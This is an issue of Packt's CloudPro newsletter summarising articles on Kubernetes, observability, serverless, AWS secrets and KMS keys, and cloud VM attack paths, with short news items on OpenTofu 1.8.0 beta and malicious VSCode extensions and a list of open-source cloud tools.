CloudPro #55: Get ready for OpenTofu Beta 1.8.0

Kubernetes Network Observability with IBM SevOne 7.0 and eBPF

Packt

Jul 12, 2024

Welcome to the 55th edition of CloudPro! Today, we’ll talk about:

⭐Masterclass:

🔍Secret Knowledge:

⚡Techwave:

🛠️HackHub: Best Tools for the Cloud

Cheers,

Shreyans Singh

Editor-in-Chief

Forwarded this Email? Signup Here

⭐MasterClass: Tutorials & Guides

⭐Stateful apps in Kubernetes. From fundamentals to operators

Stateful applications in Kubernetes require additional attention due to their need to persist data across instances and reboots, unlike stateless applications. In the early days of Kubernetes, it primarily supported stateless workloads, but the demand for stateful applications like databases and message queues led to the introduction of StatefulSets in Kubernetes 1.3. StatefulSets provide guarantees about the ordering and uniqueness of pods, making them suitable for running stateful applications.

Running stateful applications in Kubernetes involves using PersistentVolumes (PVs) and PersistentVolumeClaims (PVCs) to manage storage. A PVC requests storage from a StorageClass, which allocates a PV that persists data for the application. Operators further simplify managing stateful applications by automating tasks such as provisioning, scaling, and updating. Operators leverage Kubernetes' Custom Resource Definitions (CRDs) to extend its capabilities, allowing developers to manage complex stateful applications more effectively. Examples include the ClickHouse, Redis, Kafka, PostgreSQL, and MySQL operators, each designed to handle the specific requirements and challenges of these stateful systems.

⭐Backstage on Kubernetes

In this article, you'll learn how to integrate Backstage with Kubernetes, first by running Backstage outside the cluster using the Kubernetes API, and then deploying it directly on the cluster with the official Helm chart. We will also connect Backstage with Argo CD and Prometheus, allowing us to visualize the synchronization status of Argo CD and basic metrics related to the app.

To follow along, it's helpful to review the previous article on Backstage, which covers configuring and running Backstage and building a basic template for a Spring Boot app. This article's source code is available in a GitHub repository, containing templates for Kubernetes and detailed instructions on setup. You'll also learn to install necessary components like Prometheus and Argo CD on Kubernetes and configure Backstage with additional plugins for a more integrated cloud-native environment.

⭐Manage secrets in AWS EKS with AWS Secrets Manager securely

Managing secrets such as API keys and database passwords securely is crucial for maintaining the security of applications running in Kubernetes. When using Amazon EKS (Elastic Kubernetes Service) for these applications, AWS Secrets Manager can be employed to handle these secrets safely and efficiently. AWS Secrets Manager integrates with EKS through the AWS Secrets and Configuration Provider (ASCP) for the Kubernetes Secrets Store CSI Driver, offering centralized secret management, fine-grained access control, and seamless integration.

To implement this, secrets are created in AWS Secrets Manager and an IAM policy is set up for secret retrieval. Using IAM Roles for Service Accounts (IRSA), access to secrets can be restricted, and a SecretProviderClass custom resource is deployed. This resource enables pods to mount volumes based on the secrets and syncs them with native Kubernetes secrets. Furthermore, Amazon EKS clusters (version 1.13 and above) support encrypting Kubernetes secrets with AWS Key Management Service (KMS) Customer Managed Keys (CMK), enhancing security beyond the default Base64 encoding. This integration allows for robust secret management and encryption, ensuring that sensitive information remains secure while simplifying the overall process for Kubernetes applications.

⭐Your guide to observability engineering in 2024

In 2024, observability engineering is essential for identifying and addressing unknown issues in complex systems. While traditional monitoring, alerting, and troubleshooting methods can help with known problems, they often fall short in uncovering the root causes of unexpected outages. Observability engineering evolves these processes and tools to effectively query telemetry data, visualize anomalies, and explore solutions for unique incidents in today's cloud environments.

Embracing observability engineering involves measuring a system's internal states through its outputs, providing a comprehensive view beyond basic monitoring. It includes collecting, analyzing, and visualizing telemetry data such as metrics, logs, and traces to diagnose issues and ensure system reliability. Key components include logs, metrics, traces, and a broader strategy that incorporates continuous profiling and business metrics. An observability engineer's role is multifaceted, requiring expertise in data pipelines, system analysis, and troubleshooting to maintain and optimize complex, distributed systems.

⭐The complete guide to serverless apps

The concept of "serverless" emerged around 2012 but gained significant traction with the launch of AWS Lambda in 2014. While the term implies the absence of servers, it actually refers to a model where developers don't need to manage server infrastructure. Instead, the cloud provider handles server management, allowing developers to focus solely on writing code. This shift has driven the popularity of serverless, as it simplifies the development process and reduces operational overhead.

Serverless applications can be defined in three ways: as SaaS where the user doesn't manage cloud resources, as hosted applications where the infrastructure is managed by the provider, and as software concepts where developers write event-driven functions instead of maintaining long-running servers. This approach allows for efficient, scalable, and cost-effective applications, as the serverless platform handles the underlying complexities of deployment, scaling, and management.

In comparison to Platform-as-a-Service (PaaS), serverless platforms offer greater simplicity and efficiency by eliminating the need for developers to manage server processes. While PaaS allows for long-running services with self-service deployment, serverless platforms are optimized for quick, event-driven functions that can scale rapidly and operate more resource-efficiently. This makes serverless an attractive option for developers seeking to streamline their workflows and build responsive, scalable applications.

Take part in our Tech Pro Learning Survey and share your insights on educational materials and AI advancements. Your feedback is crucial in helping us enhance learning tools for tech professionals. It's quick and impactful—your voice matters!

Click here to participate and make a difference! 🚀

🔍Secret Knowledge: Learning Resources

🔍How Stripe’s Document Databases Supported 99.999% Uptime with Zero-Downtime Data Migrations

In 2023, Stripe managed to process $1 trillion in payments while maintaining an impressive 99.999% uptime. This reliability is largely due to their custom-built database infrastructure, called DocDB, which is an extension of MongoDB Community. DocDB handles over five million queries per second and supports Stripe’s diverse and extensive data needs. The infrastructure includes over 2,000 database shards, ensuring efficient and low-latency access to crucial financial data.

Central to DocDB’s performance is the Data Movement Platform, which facilitates seamless, zero-downtime data migrations across database shards. Originally designed to overcome scaling limits, this platform now enables Stripe to merge, upgrade, and reallocate database shards efficiently. The process includes bulk data import, asynchronous replication, correctness checks, and a sophisticated traffic switch mechanism that ensures minimal disruption during migrations. This robust system allows Stripe to maintain high availability and performance, crucial for their extensive and critical operations.

🔍Anomaly Alerting in Prometheus

We focus on anomaly alerting to detect issues like performance regressions without predefined thresholds. Using Prometheus with Istio, we can set up a generic anomaly detection system for response times that applies to all services running on a mesh.

First, we establish a baseline by creating a simple time series from high cardinality metrics using a recording rule. This helps us monitor key metrics like the 95th percentile response time. Next, we build a prediction model based on historical data, averaging the last three weeks to avoid skewing from outliers. This prediction, combined with the current data, helps us calculate a Z-score to identify significant deviations from the norm. We then create an alert to trigger when response times exceed three standard deviations for five minutes, signaling potential anomalies without overloading with false positives.

🔍The ROI of improving and investing in DORA

DORA Metrics provide a comprehensive view of your software team's performance, helping identify areas for improvement and measure the return on investment (ROI) of these enhancements. The basic ROI calculation for improving DORA Metrics revolves around reducing the time engineers spend on non-value-add tasks. For example, if developers waste less time on administrative tasks, the cost savings can be significant. This simple approach shows how reducing wasted time can justify the investment in tools and practices to improve DORA Metrics.

A more sophisticated ROI model links improvements in DORA Metrics directly to revenue. By calculating the revenue generated per effective developer hour, you can demonstrate that eliminating waste increases the time developers spend on productive tasks, thus boosting revenue. For instance, if improving DORA Metrics can reduce wasted time by 10%, each developer can support more revenue, potentially converting to millions in additional ARR. This approach provides a clear business case, highlighting the substantial financial benefits of investing in DORA Metrics, beyond mere cost savings.

🔍AWS Managed KMS Keys and their Key Policies

AWS Managed KMS Keys are encryption keys managed by AWS but used within your own AWS account, often applied as default keys for various services. These keys have their own key policies and can impact security and application design, but visibility into their usage and management is often limited. To address this, we created a tool that scans AWS services to identify AWS Managed KMS Keys and their associated key policies, providing a comprehensive list and making it available on GitHub. This tool helps track which services use these keys and the security implications of their policies.

AWS Managed KMS Keys offer convenience, as AWS handles their creation, management, and rotation, and there’s no extra cost for using them. However, they might not be suitable for all scenarios, particularly those requiring detailed key management or cross-account access. Our tool also highlights that while AWS provides these keys, there is often no central documentation on their availability or usage, making it hard to get a full picture of their impact. By offering a detailed report of AWS Managed KMS Keys and their policies, we aim to enhance visibility and help organizations make informed decisions about when and how to use these keys.

🔍Attack Paths Into VMs in the Cloud

In the cloud, virtual machines (VMs) are common and crucial components of many IT infrastructures. However, their frequent use makes them attractive targets for attackers. This post reviews how attackers might exploit VMs and offers strategies for organizations to secure their environments. It examines attack methods across three major cloud platforms—AWS, Azure, and Google Cloud Platform—focusing on how attackers might exploit vulnerabilities or misuse features like startup scripts and SSH key management.

Attackers can exploit various features and configurations of VMs to gain unauthorized access or escalate their privileges. For example, they might exploit critical vulnerabilities in exposed VMs, manipulate startup scripts to execute malicious code, or misuse features like SSH key management to gain access to VMs. The post details these attack methods, highlighting the conditions that must be met for these attacks to succeed and offering mitigation strategies to protect against them. Effective management of permissions and careful configuration are essential to secure VMs from potential threats.

⚡ TechWave: Cloud News & Analysis

⚡Introducing: Kubernetes Network Observability with IBM SevOne 7.0 and eBPF

IBM SevOne 7.0 introduces a new feature that tackles this challenge head-on by offering advanced network observability for Kubernetes environments. Through a combination of IBM SevOne 7.0 and RedHat NetObserv, this solution provides detailed visibility into network traffic within Kubernetes clusters.

It uses eBPF technology to offer deep insights into network performance, including data flows between pods, nodes, and namespaces, as well as external interactions. This tool enriches network data with valuable context like geographic locations and autonomous systems, bridging the gap between NetOps and DevOps teams and ensuring they have the information needed to maintain a reliable and performant application experience.

⚡SUSE Acquires StackState for Cloud-Native Observability

SUSE has announced that it is acquiring StackState to enhance its Rancher platform for managing Kubernetes clusters. This acquisition will integrate StackState’s advanced observability features into the Rancher Prime version, aimed at enterprise IT teams. The plan includes expanding StackState’s capabilities across SUSE’s portfolio to improve cost management, issue resolution, and optimization for cloud-native applications and IoT environments.

StackState offers a unique approach to observability by providing a comprehensive view of all components in a cloud environment, from applications and services to infrastructure. Its ability to automatically map dependencies and integrate with various cloud platforms and monitoring tools sets it apart from other observability solutions. By embedding StackState into Rancher Prime, SUSE aims to give IT teams a powerful tool for monitoring and managing complex cloud-native applications, ensuring better performance and reliability across their technology stacks.

⚡Get ready for OpenTofu Beta 1.8.0

OpenTofu Beta 1.8.0 is now available for testing, and the team behind it has been refining the release based on user feedback from the alpha version. This new beta version introduces features like provider mocking in tests, which allows users to simulate resource and data source interactions without needing an actual cloud setup. It also supports resource overrides and early variable evaluation for more flexible configurations.

You can download the beta release for various platforms from GitHub, but remember it’s not intended for production use. The update also includes bug fixes, improved error messages, and enhanced compatibility with Terraform modules. The OpenTofu team invites users to test the release and provide feedback through GitHub or Slack.

⚡Malicious VSCode extensions with millions of installs discovered

Researchers recently uncovered serious security issues in the Visual Studio Code (VSCode) Marketplace. By creating a fake version of the popular 'Dracula Official' theme, they managed to trick over 100 organizations into installing their malicious extension. This fake extension collected sensitive system information from users without triggering traditional security defenses.

Their investigation revealed that the VSCode Marketplace is filled with risky extensions, including some with known malicious code and others that could potentially harm users. They found thousands of extensions with millions of installs, many of which contained dangerous features like hardcoded IP addresses or unknown executables. The researchers have reported these threats to Microsoft but noted that many malicious extensions remain on the marketplace. They also plan to release a new tool to help developers identify and avoid these security risks.

⚡Java observability with OpenTelemetry, Grafana Cloud, and Digma.ai

In the past, developers mainly used simple logs for debugging, while metrics and traces were handled by IT teams. This meant that developers often only engaged with observability tools reactively, when problems occurred. Today, new tools and practices are making it easier for developers to integrate observability into their daily work.

For instance, tools like OpenTelemetry and Grafana Cloud now enable developers to collect and visualize performance data from their applications more easily. Digma.ai takes this a step further by integrating observability directly into the IDE, allowing developers to see and act on performance data in real-time. This approach shortens the feedback loop between introducing a bug and discovering it, making it easier for developers to address issues quickly and improve their code continuously.

🛠️HackHub: Best Tools for Cloud

🛠️orbitinghail/sqlsync

SQLSync is a tool that lets users collaborate on web apps offline using a local SQLite database that syncs data across devices and users.

🛠️szymon-szym/lambda_helpers_metrics

A library that simplifies sending custom metrics to CloudWatch using EMF (Embedded Metric Format).

🛠️mostlycloudysky/cloudysetup

A Python tool that uses Amazon Bedrock’s AI to manage AWS resources by generating, applying, and improving AWS resource configurations with the Cloud Control API.

🛠️hcavarsan/kftray

KFtray is a cross-platform system tray app that simplifies managing multiple `kubectl port-forward` commands for Kubernetes users, supporting both TCP and UDP connections.

🛠️keycloak/keycloak

Keycloak is an open-source identity and access management tool that provides authentication, user management, and fine-grained authorization for applications with minimal setup.